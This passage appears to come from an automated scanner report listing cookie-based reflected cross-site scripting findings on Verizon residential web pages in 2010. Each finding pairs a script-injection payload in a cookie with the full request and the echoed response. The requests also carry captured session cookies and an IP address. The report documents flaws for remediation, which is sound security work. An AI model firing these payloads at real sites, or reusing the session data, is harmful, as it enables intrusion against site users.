Cookie: Source=CHSI; vzapps=STATE=TXc5db1'><script>alert(1)</script>7ef783c9f97; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60724
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5db1'><script>alert(1)</script>7ef783c9f97; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Expert Care
</title><meta name="keywords" content="computer support, tech support, pc support, computer services, comp
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5DB1'><SCRIPT>ALERT(1)</SCRIPT>7EF783C9F97 ' />
...[SNIP]...

2.934. http://www22.verizon.com/Residential/TV/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/TV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fc1d'><script>alert(1)</script>57067391278 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8fc1d'><script>alert(1)</script>57067391278; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 00:11:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8fc1d'><script>alert(1)</script>57067391278; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8FC1D'><SCRIPT>ALERT(1)</SCRIPT>57067391278 ' />
...[SNIP]...

2.935. http://www22.verizon.com/Residential/WiFi/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63a3c'><script>alert(1)</script>03a48b9a52e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX63a3c'><script>alert(1)</script>03a48b9a52e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63721
Expires: Sat, 20 Nov 2010 00:12:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX63a3c'><script>alert(1)</script>03a48b9a52e; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi, ISP, internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX63A3C'><SCRIPT>ALERT(1)</SCRIPT>03A48B9A52E ' />
...[SNIP]...

2.936. http://www22.verizon.com/Residential/WiFi/HowToGetIt [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/WiFi/HowToGetIt

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9067c'><script>alert(1)</script>8e4bfe5a6f4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/HowToGetIt HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65811
Expires: Sat, 20 Nov 2010 00:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9067c'><script>alert(1)</script>8e4bfe5a6f4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Wi-Fi: How to Get It
</title><meta name="keywords" content="verizon internet services, verizon internet products, verizon wi-fi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9067C'><SCRIPT>ALERT(1)</SCRIPT>8E4BFE5A6F4 ' />
...[SNIP]...

2.937. http://www22.verizon.com/Residential/aboutFiOS/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c66b'><script>alert(1)</script>349281a9b34 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3c66b'><script>alert(1)</script>349281a9b34; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69341
Expires: Sat, 20 Nov 2010 03:23:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX3c66b'><script>alert(1)</script>349281a9b34; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:23 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3C66B'><SCRIPT>ALERT(1)</SCRIPT>349281A9B34 ' />
...[SNIP]...

2.938. http://www22.verizon.com/Residential/aboutFiOS/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e344"-alert(1)-"44c032e99f0 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=9e344"-alert(1)-"44c032e99f0; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76416
Expires: Sat, 20 Nov 2010 03:23:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:23:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:23:16 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "9e344"-alert(1)-"44c032e99f0"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.939. http://www22.verizon.com/Residential/aboutFiOS/Features/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/Features/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74cb5'><script>alert(1)</script>82c3e64957b was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX74cb5'><script>alert(1)</script>82c3e64957b; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63855
Expires: Sat, 20 Nov 2010 03:24:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:24:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:24:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX74cb5'><script>alert(1)</script>82c3e64957b; path=/
